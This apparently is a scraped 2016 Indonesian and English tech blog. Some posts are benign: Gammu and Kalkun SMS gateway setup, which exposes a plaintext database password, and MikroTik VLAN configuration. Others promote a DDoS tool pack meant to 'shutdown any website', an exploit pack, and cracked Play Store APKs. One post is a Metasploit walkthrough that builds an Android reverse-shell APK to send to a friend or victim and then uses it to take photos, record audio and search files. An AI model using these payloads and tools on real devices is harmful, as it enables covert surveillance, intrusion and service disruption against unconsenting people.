Minggu, 28 Februari 2016

SMS Gateway How to Setup Gammu

SMS Gateway Linux
banner sms gateway
~How to Setup Gammu~

Kalau bicara tentang SMS Gateway, ini salah satu software Engine-nya. Gammu ini sebagai SMS daemon (gammu-smsd) yang berfungsi untuk mengirim dan menerima pesan dari Phone/modem.

1. Laptop/Komputer
2. OS Linux
3. Koneksi Internet (Untuk instalasi)
4. Modem
5. Kartu Perdana (Indosat, Telkomsel, Xl, dll)

Disini, penulis menggunakan OS Linux (Linux Mint 17.3 Cinnamon 64-bit). Penulis disini nanti akan menggunakan Kalkun untuk Management SMS-nya.

Langkah-langkah Instalasi dan Konfigurasi Gammu
1. Instal Gammu
# apt-get install gammu gammu-smsd
- Setelah instalasi silahkan tancapkan modem ke Laptop/Komputer.
- Kemudian Connect-Disconnect Koneksi 'Mobile Broadband' pastikan lampu LED warna biru pada Modem hidup.
dial modem

- Stop service gammu-smsd.
# service gammu-smsd stop
- Cek status service Gammu.
# service gammu-smsd status
 gammu-smsd status

-Silahkan cek device USB yang sudah terhubung ke Laptop/Komputer.
# dmesg | greb tty
check device modem sms gateway
# gammu --identify
detail device modem sms gateway

Berarti lokasi USB Modem yang terhubung ke Laptop berada di /dev/ttyACM0.

Pengalaman menggunakan device Modem yang berbeda, contohnya: Wavecom Fastrack M1306B biasanya diminta untuk Gammu-config dahulu:
# gammu-config

Lebih jelasnya silahkan baca disini.

2. Konfigurasi Gammu koneksi ke Kalkun.

a). Silahkan edit file gammu-smsdrc
# nano /etc/gammu-smsdrc
port = /dev/ttyACM0
connection = at

PIN= ''
runonreceive = /var/www/html/kalkun/scripts/daemon.sh
logfile = /var/log/gammu.log

DeliveryReport = sms

# Increase for debugging information
debuglevel = 1

#Tambahkan Koneksi MySQL, sesuaikan dengan user, password, dan database anda.
service = sql
driver = native_mysql
database = kalkun
user = root
password = luxsmart123
pc = localhost
Versi aslinya:
konfig file gammu

b). Silahkan dicoba untuk cek Pulsa dulu menggunakan perintah:
#  gammu --getussd *888#
cek pulsa sms gateway linux

c). Oke, silahkan aktifkan service Gammu-nya supaya dapat mengirim dan menerima pesan.
# service gammu-smsd start
Disini saya menggunakan software Kalkun untuk Management SMS-nya.
Silahkan baca tutorial : SMS Gateway How to Install Kalkun

Oke... Tinggal Testing Kirim Pesan....
cek kalkun sudah terintegrasi dengan gammu

Penulis telah menguji konfigurasi diatas, alhamdulillah berjalan dengan baik.
Untuk teknik lanjutan, silahkan anda kembangkan sendiri.

Untuk Troubleshooting-nya silahkan chatting aja via BBM atau Komentar dibawah... Terimakasih...

Semoga bermanfaat...
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SMS Gateway How to Install Kalkun

SMS Gateway How to Install Kalkun On Linux
login admin kalkun
How to Install Kalkun */ Cara Instal Kalkun /* 
"Tutorial ini saya tulis tidak se-detail step-by-step, perlu ilmu perintah dasar (CLI) linux dan pengalaman set up aplikasi Website pada OS Linux" By: Lux-Smart

Pengertian Kalkun
Kalkun merupakan software open-source yang digunakan untuk management SMS (Short Message Service). Biasanya kalkun ini menggunakan Engine Gammu-smsd yang berguna untuk mengirim dan menerima pesan dari Phone/modem. Sumber: Sourceforge

Sebelum instal kalkun ada beberapa hal yang harus dipenuhi diantaranya:
1. Komputer/Laptop
2. Phone/modem (Untuk testing Phone di Gammu)
3. Operating System (Windows/Linux, dll "Yang penting dapat menjalankan Web Server, Databases Server, Gammu" ).
4. PHP (php-cli, mysql, hash, session, mbstring, and json. cURL (optional).
5. MySQL/PostgreSQL/SQLite3.
6. Apache/lighthttpd/nginx/IIS.
7. Gammu-smsd
8. Web Browser terbaru.
9. phpMyAdmin

Disini, penulis menggunakan OS Linux (Linux Mint 17.3 Cinnamon)

Langkah-langkah instalasi
1. Download source-code lates disini.
#Letakkan file tadi pada folder /var/www/html/
#Rename foldernya menjadi 'kalkun' 
#Lakukan chmod -R 755 folder
#Lakukan chown -R www-data:www-data folder

2. Buat database untuk Kalkun.
create database

3. Edit file database.php yang berada kalkun/application/config/database.php
Disini saya menggunakan MySQL, jadi yang saya edit adalah koneksi database MySQL.
koneksi database
NB: Silahkan disesuaikan dengan ['username'] dan ['password'] MySQL anda.

5. Import mysql.sql Gammu.
Dimana letak file mysql.sql gammu? [/usr/share/doc/gammu/examples/sql/] disana ada file mysql.sql.gz, jadi harus anda ekstrak dulu. Setelah itu silahkan import pada database 'kalkun' (database yang dibuat pada langkah nomor 2)

Screenshoot imported database kalkun:
imported database sql

6. Edit file daemon.sh sehingga menjadi:
Dimana letak file daemon.sh ? [kalkun/scripts/daemon.sh]

7. Edit file daemon.php
Letak file tersebut di [kalkun/scripts/daemon.php]

8. Silahkan lakukan instalasi-nya lewat browser: [http://localhost/kalkun]
installation kalkun

installation kalkun

installation kalkun

installation kalkun

9. Hapus folder /install.
# rm -r /var/www/html/kalkun/install/

10. Silahkan buka lagi Kalkun.
login kalkun
~ Status : Disconnected
status disconnected
Status 'Disconnected' biasanya disebabkan karena device phone/modem tidak terhubung, selain itu status tersebut juga disebabkan karena waktu belum tersinkronisasi. Terus, bagaimana sinkronisasi waktu kalkun?

How To Syncronization Timezone Kalkun

Jawab: Edit file index.php Hapus ' // ' pada tulisan: date_default_timezone_set('Asia/Jakarta');
# nano /var/www/html/kalkun/index.php
syncronization time kalkun

Oke, selesai... Silahkan testing SMS Gateway anda...

Sumber: Blog Sleeplessbeastie
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Selasa, 23 Februari 2016

Distrubuted Denial of Service Attack Mini Pack

DDoS Attack Pack

Beware of Distributed Denial of Service Attacks


This Acronym DDoS spells out  "Distributed Denial of Service." A DDoS assault is a pernicious endeavor to make an online administration inaccessible to clients, as a rule by incidentally hindering or suspending the administrations of its facilitating server.

(DoS) VS (DDos)

Unlike the Denial of Service (DoS) attack, where a single web-connected device (one network connection) is used to flood targeted resource with packets, a DDoS attack is executed from many unique connected devices, often distributed globally referred to as a botnet.

Two Types Of DDoS Attacks


This DDoS assault influences the User Datagram Protocol (UDP), a sessionless systems administration convention. This sort of assault surges irregular ports on a remote host with various UDP packets, bringing about the host to over and over check for the application listening at that port, and (when no application is discovered) answer with an ICMP Destination Unreachable bundle. This procedure saps host assets, and can at last prompt distance.


A SYN surge DDoS assault abuses a known shortcoming in the TCP association grouping (the "three-way handshake"), wherein a SYN solicitation to start a TCP association with a host must be replied by a SYN-ACK reaction from that host, and after that confirmed by an ACK reaction from the requester. In a SYN surge situation, the requester sends numerous SYN asks for, however either does not react to the host's SYN-ACK reaction, or sends the SYN asks for from a ridiculed IP address. In any case, the host framework keeps on sitting tight for affirmation for each of the solicitations, tying assets until no new associations can be made, and at last bringing about disavowal of administration.

The Three Divisions of DDoS are

Volume Based Attacks
Protocol Attacks
Application Layer Attacks

I have grouped up some DDoS tool found various places over the internet so you can test and if possible fix any bugs.

DDos Tools 
Link One
Link Two
Link Three
Link Four 
Link Five
Mini Ultimate Pack Depositfiles (Compressed by Ha{k3r4l!f3 )

Share and Comment for My Full Pack 
Shutdown any website Https / Http
Ultimate Hack Pack 3.85 Gb Coded by Ha{k3r4l!f3

"Corupt Fear Us~ Guilty Confess to Us~ Heroes Join Us"


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Sabtu, 20 Februari 2016

Teenage Hacker Arrested For Hacking FBI Material

 Teenage Hacker Arrested For Hacking FBI Material

A 15-year-old teen got captured from Scotland, by British Police for breaking into the FBI Systems on 16th February 2016.

Under the Britain’s Hacking Law, Computer Misuse Act 1990, the teen has been arrested for his role in hacking an unauthorized digital material belonging to the Federal Agents.

Federal Agents have already fled to Glasgow in an attempt to carry out a complete raid on the individuals home before proceeding with the boy's arrest.

As with the present scenario, reports reveal that the boy could be extradited to the United States to face the Intrusion and hacking charges.

Second Member of the Hacking Group Arrested

The suspect is believed to be an active member of the notorious hacking group called "Crackas with Attitude" aka "CWA", Motherboard confirms.

Another member of the same group got arrested from the United Kingdom last week. The 16-year-old British teenager was suspected of hacking into the CIA and the FBI confidential files and documents breaching security of the FBI.

The hacktivist group "Crackas with Attitude" is behind a multiples of hacks on the United States government and its high-level officials causing much damage with each attack.

As seen above by @IncursioSubter
Nowadays, the amateurish approach of teenage hackers are hunting down the world's greatest Crime solvers such as FBI and CIA.

Newbie Hackers and Script Kiddies dont go fooling arround and get caught 

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Kamis, 18 Februari 2016



Credits to JUAN SACCO for completing the compression and compilation of this tool !!

ULTIMATE Exploit Pack utilizes a propelled programming characterized interface that upholds quick reconfiguration to adjust exploitation codes to the always advancing risk environment. Our innovations permit you to quickly tests and safeguard your border against threatening remote targets.

We enhance ULTIMATE Exploit Pack code  on a consistent basis and our Tech  group is really great about keeping the code stable, yet it is not slug verification (bullet proof). Along these lines, utilizing the most recent stable code is a protected and simple approach to access the new components as we're included.

If you like it you can consider ......

Install Notes

Installation notes:

For Windows:
Download and install Java 8 from Oracle:
Windows Java SE Java 8 for 32 bits or Java 8 for 64 bits 
After you have installed Java 8 in your machine, double click ExplotPack.jar or from a console run this command: "java -jar ExploitPack.jar"

For Linux:
Under any Linux distribution that supports DEB packages like Ubuntu, Debian, Kali, etc. you can run the following commands to install Java 8 from an official repository 
Copy and paste the following in a terminal window:

echo "deb http://ppa.launchpad.net/webupd8team/java/ubuntu trusty main" >> /etc/apt/sources.list
echo "deb-src http://ppa.launchpad.net/webupd8team/java/ubuntu precise main" >> /etc/apt/sources.list
sudo apt-key adv --keyserver keyserver.ubuntu.com --recv-keys EEA14886
sudo apt-get update
sudo apt-get install oracle-java8-installer

For OSX:
Download and install Java 8 for OSX 32/64 bits from Oracle: OSX Java 8 32/64 bits
After you have Java 8 installed in your Mac, double click ExploitPack.jar to run it or from a console: "java -jar ExploitPack.jar"

Known issues:
Using Exploit Pack could produce addiction
Prolonged periods of time using this tool could produce network mayhem or even dead

In case of intoxication ( using Exploit Pack under Windows ) please call your doctor immediately.

Comment below on any issues or questions you want to ask 
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Rabu, 17 Februari 2016

Mengenal Mikrotik Cloud Router Switch (CRS)

Cloud Router Switch (CRS) adalah perangkat Smart Switch Series berperforma tinggi besutan Mikrotik yang memiliki banyak port ethernet (hingga 24 port). Perangkat CRS ini merupakan Multilayer Switch, yaitu selain bekerja pada layer 2, juga bisa bekerja di layer 3 switch dan uniknya OS yang digunakan juga RouterOS sehingga semua fitur pada RouterOS juga bisa diterapkan di perangkat ini. 

Contoh Mikrotik Cloud Router Switch (CRS)

Fitur Utama Cloud Router Switch

1. Forwarding
Port pada CRS dapat dikonfigurasi untuk switching maupun routing yang mendukung Full non-blocking wirespeed switching. Semua forwaerding database mendukung IVL dan SVL. Port based MAC learning limit yang dapat dikonfigurasi maksimal 1024 MAC per port. Selain itu, CRS juga mendukung frame dengan ukuran jumbo (CRS1xx: 4064 Bytes; CRS2xx: 9204 Bytes).

2. Mirroring
CRS mendukung bermacam tipe port mirroring, seperti : Port Based Mirroring, VLAN Based Mirroring, dan MAC Bassed Mirroring. Selain itu CRS juga memiliki 2 independent mirroring analyzer port.

3. Virtual LAN (VLAN)
Mikrotik CRS kompetibel dengan strandar IEEE802.1Q dan IEEE802.1ad VLAN. CRS mampu membuat active VLAN hingga 4000 VLAN. Mendukung Port Based VLAN, Protocol Based VLAN, MAC Based VLAN dan VLAN filtering.

4. Port Isolation & Leakage
CRS dapat diaplikasikan untuk mengimplementasikan private VLAN dengan 3 tipe port profile : Promiscuous, Isolated dan Community. Mendukung hingga 28 Comunity Profile.

5. Trunking 
CRS mendukung trunking dengan static link aggregation groups. Dapat membuat hingga 8 port Trunk group dan 8 port per trunk group. Mendukung Hardware automatic failover dan load balancing.

6. Quality of Service (QoS)
Mikrotik CRS juga mendukung manajemen bandwidth dengan penerapan QoS berdasarkan port, MAC, VLAN, Protocol, PCP/DEI, DSCP, ACL.

7. Shaping & Schedulling\
Mendukung 8 queue pada tiap port fisik, Shaping per port, per queue, dan per queue group.

8. Access Control List (ACL)
CRS mendukung Ingress dan Egress ACL table, dan hingga 512 ACL rule. Klasifikasi berdasarkan port, L2, L3, L4 protocol header. ACL actions meliputi filtering, forwarding dan dapat melakukan modifikasi pada protocol header fields.

Model Cloud Router Switch (CRS)

Berikut ini beberapa perbedaan pada model Mikrotik Cloud Router Switch (CRS) : 
Model CPU Wireless SFP+ port Access Control List Jumbo Frame (Bytes)
CRS112-8G-4S 400MHz - - + 9204
CRS210-8G-2S+ 400MHz - + + 9204
CRS212-1G-10S-1S+ 400MHz - + + 9204
CRS226-24G-2S+ 400MHz - + + 9204
CRS125-24G-1S 600MHz - - - 4064
CRS125-24G-1S-2HnD 600MHz + - - 4064
CRS109-8G-1S-2HnD 600MHz + - - 4064

Tagged Untagged
Di CRS, fitur tagged dan untagged bisa dibuat berdasarkan port, protocol ataupun berdasarkan mac address, agar memudahkan dalam melakukan custom di jaringan kita.
Untuk contoh topologi yang akan kita bentuk seperti berikut :
Topologi Contoh

RB450G, di interface ether5 terdapat 2 vlan, yaitu vlan-id=1 dan vlan-id=2
Kabel ethernet dari ether5 450G terhubung ke ether10 switch CRS
PC client yang akan kita masukkan kedalam vlan, terhubung ke ether12 dan ether14 dari CRS

Konfigurasi di sisi RB450G

Disini kita mendifiniskan vlan-id=1 dan vlan-id=2 di interface ether5. Dan tentunya kita juga pasangkan IP di masing-masing interface vlan tersebut.

Konfigurasi di CRS
Agar dapat memfungsikan fitur-fitur switch pada CRS kita, langkah pertama yang harus dilakukan adalah mengeset parameter "master-port" di interface ethernet yang ingin kita aktifkan sebagai switch. Fungsi dari master-port ini sebagai interface penghubung antara ethernet-ethernet yang menggunakan mode switch (SLAVE-PORT) dengan interface ethernet lain yang non switch mode. 

Dari gambar terlihat, ether12 dan ether14 kita atur sebagai slave dengan master-portnya di ether10. Artinya, ether10, ether12 dan ether14 sudah menjadi sebuah switch dan komunikasi antara port tersebut bisa full wire speed tanpa membebani CPU router lagi.
Apabila kita ingin memfungsikan routing, firewall, bandwidth management, qos dan sebagainya, kita cukup memasang rule-rulenya di ether10. Kenapa? karena ether10 berfungsi sebagai master-portnya, otomatis, setiap rule di ether10, akan berlaku di semua slave portnya (ether12 dan ether14)

VLAN berdasarkan Port
Dicontoh ini kita akan memfungsikan switch kita sebagai switch managed l2 berdasarkan PORT INTERFACE.
Karena ether10 terhubung ke interface RB450G yang memiliki vlan-id, berarti kita ingin semua trafik yang keluar dari ether10 harus sudah memiliki vlan-id (tagged / trunk port), begitu juga sebaliknya, karena perangkat yang terhubung di ether12 dan ether14 merupakan perangkat PC biasa, berarti kita harus mengatur semua trafik yang keluar dari kedua port tersebut harus dihilangkan dahulu vlan-idnya (untagged / access port).

Ingress VLAN Translation
Di menu ini, kita bisa memodifikasi frame yang masuk/incomming/ingress dari port switch kita.

Dari gambar terlihat, semua trafik yang berasal dari ether12 dan ether14 diset new-customer-vid sesuai dengan VLAN-ID pada RB450G, artinya frame yang semula memiliki customer-vid=0 (tanpa vlan-id), begitu masuk dari ether12 dan akan ke ethernet manapun akan diset memiliki new-customer-vid=1 (vlan-id=1 / tagged)

Egress VLAN Translation
Di menu ini, kita bisa memodifikasi frame yang akan keluar / outgoing / egress dari port switch kita.

Dari gambar terlihat, semua trafik yang akan keluar dari ether12 dan ether14 diset new-customer-vid menjadi 0 (tanpa vlan-id), sehingga trafik yang keluar dari ether12 dan ether14 bisa diterima PC biasa. Hal ini sama dengan membuat ether12 dan ether14 menjadi access port / untagged.

Hasil Akhir Dengan memfungsikan konfigurasi diatas, PC client yang berada di vlan1 dan vlan2 komunikasinya tidak lagi via layer 2 meskipun berada dalam 1 switch fisik, tetapi harus komunikasi inter-vlan yaitu melalui RB450G. 

Sumber :
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Selasa, 16 Februari 2016

How to access a Remote Shell on an Android using Metasploit

How to access a Remote Shell on an Android Phone using Metasploit

You will need ...

  • Linux Based System
  • A brain :) 
  • Knowledge of linux or maybe not....

To begin the process , we need to create an APK that will incorporate a remote shell. To do such, we will utilize the msfpayload command from Metasploit.

In Kali Linux (what i will be using) , fire up a terminal prompt and type:

sudo msfpayload android/meterpreter/reverse_tcp LHOST= LPORT=4444 R > app.apk

The msfpayload command takes one of the meterpreter payloads and allows you to create a stand alone file or application with it. You will need to put your Kali Linux IP address in for the LHOST address highlighted in BOLD . You may want to change the port address also if you please.

Once this is executed, a file called “app.apk” will be created on the desktop:

Now just send this file to your Android device or device you wanna hack maybe your friends phone ;) , I used a Samsung Android Phone in this case.

Next we got to set Metasploit up to listen for all incoming connections.

In Kali OS  , start Metasploit from the menu or by executing “msfconsole” in a Terminal window.

Once Metasploit fires up, type the following commands to create a listener:

use exploit/multi/handler
set payload android/meterpreter/reverse_tcp
set LHOST (enter your Kali IP address)
set LPORT 4444 (your choice between ports 2834 and 4500 )
And to start the handler type exploit

When you run the app on your Android device or victims runs it. It will pop up as a large “M” icon with “Main Activity”or something of that sort.

 A large button will appear on your phone that displays, “ReverseTcp”, when it is pressed, your phone will connect out to the Metasploit system and a remote shell session is created.

On your Metaploit Framework you should see this:

An active session as shown is already created and it leads you automatically into a meterpreter prompt / command interface.

 From there your can type ~sysinfo~ and device information will be displayed to you also you can type "ps" and the processes running will be displayed.

Typing “help” at a meterpreter prompt will list all the command that are available.

Amazing stuff you can with your running meterpreter session

Search for a file

meterpreter > search –f *.mp4

Take photos using the devices cameras

First list all the webcams that are available:

meterpreter > webcam_list

You can now run the webcam_snap command, by default it takes a photo using the first camera:

meterpreter > webcam_snap

If you want to take a photo using the second camera

meterpreter > webcam_snap –I 2

Record sound with the microphone

Run the record_mic command:

meterpreter > record_mic 5

Audio saved to: /root/JxltdUyn.wav

Run the following command to stream from the second camera:

meterpreter > webcam_stream –I 2

Any Issue or thing you dont understand feel free to comment below ... Thanks 

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Senin, 15 Februari 2016

Google Play Store BlackUI MOD|Cracked APK Latest

Google Play Store APK Original & Cracked Black UI Mod Included{NEWEST}

Today we are going to share Google Play Store Original  APK & Cracked Latest Release. Google Play Store Black UI Mod APK, Google Playstore APK Cracked new latest. Google Play Store BlackUI MOD|Cracked APK Latest.


Google Play is one of the best location to look for all your most loved apps , games and themes. With more than 470,000 applications, a great many editors and books, and a large number of themed launchers, Google Play has something for each and everybody.Google Play Store BlackUI MOD|Cracked APK Latest

Google Play Store BlackUI MOD|Cracked APK Latest

Google Play Store BlackUI MOD|Cracked APK Latest
Google Play Store BlackUI MOD|Cracked APK Latest
Google Play Store BlackUI MOD|Cracked APK Latest
What’s new about Google Play Store BlackUI MOD|Cracked APK Latest version 
                                                  : Modded by ChelpuS :

  • Families Sharing And Gifting of others
  •  Add NFC-Enabled Credit Cards easily with added option
  • You can now copy change logs and descriptions.
  • Use Google LVL protected apps.
  • Verify Offline
  • Patching not needed any more
  • Can not download paid apps for free directly
  • Disable auto update
  • Billing and License Verification to Proxy no longer work
  • Refund button reworked
  • All Bugs Fixed :)

DOWNLOAD Google Play Store BlackUI MOD|Cracked APK Latest

Links Below.....

                                                      Google Play Store Patched Cracked APK -Patched | Mirror

                                                     Google Play Store BlackUI MODAPK Black Mod | Mirror

Any Difficulties feel free to comment below :) 
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